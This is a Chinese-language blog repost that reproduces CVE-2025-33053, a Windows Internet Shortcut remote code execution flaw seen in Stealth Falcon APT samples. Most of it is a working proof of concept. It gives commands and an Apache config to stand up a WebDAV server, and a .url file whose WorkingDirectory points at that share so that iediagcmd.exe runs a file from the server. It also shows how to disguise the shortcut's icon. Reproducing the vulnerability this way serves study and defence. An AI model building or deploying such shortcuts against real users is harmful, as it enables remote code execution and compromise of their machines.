
CVE-2025-33053 网络快捷方式文件远程代码执行漏洞
CVE-2025-33053 网络快捷方式文件远程代码执行漏洞
背景
微软6月修复了一个网络快捷方式的漏洞,由checkpoint捕获的APT组织Stealth Falcon样本中发现的。
复现
设置.url
文件的WorkingDirectory
为远程恶意服务器的webdav
文件夹, 在打开时会调用iediagcmd.exe
, 进而调用同目录下的route.exe
, 因为工作文件夹设置成了恶意服务器上的路径, 就会启动恶意服务器的route.exe
, 具体复现如下:
创建webdav服务器
安装:
sudo apt update && sudo apt upgrade -y
sudo apt install apache2 apache2-utils -y
sudo a2enmod dav
sudo a2enmod dav_fs
sudo systemctl restart apache2
sudo mkdir -p /var/www/webdav
sudo chown www-data:www-data /var/www/webdav
sudo chmod 755 /var/www/webdav
sudo vim /etc/apache2/sites-available/webdav.conf
配置文件:
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/webdav
<Directory /var/www/webdav>
Options Indexes FollowSymLinks
AllowOverride None
DAV On
Require all granted
</Directory>
ErrorLog ${APACHE_LOG_DIR}/webdav_error.log
CustomLog ${APACHE_LOG_DIR}/webdav_access.log combined
</VirtualHost>
重启:
sudo a2ensite webdav.conf
sudo a2dissite 000-default.conf
sudo systemctl reload apache2
从本地计算机复制一份iediagcmd.exe
到webdav
文件夹, 然后把calc.exe
复制到webdav
文件夹里。
制作URL文件
新建一个txt,写入以下内容,WorkingDirectory
设置为远程服务器的路径:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.146.138@80/DavWWWRoot\
ShowCommand=7
IconIndex=70
IconFile=C:\Windows\System32\SHELL32.dll
可以通过IconFile
和IconIndex
来设置url文件的图标
最终效果
参考
CheckPoint的文章(https://research.checkpoint.com/2025/stealth-falcon-zero-day/)
免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。
本文是转载文章,版权归原作者所有。建议访问原文,转载本文请联系原作者。
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果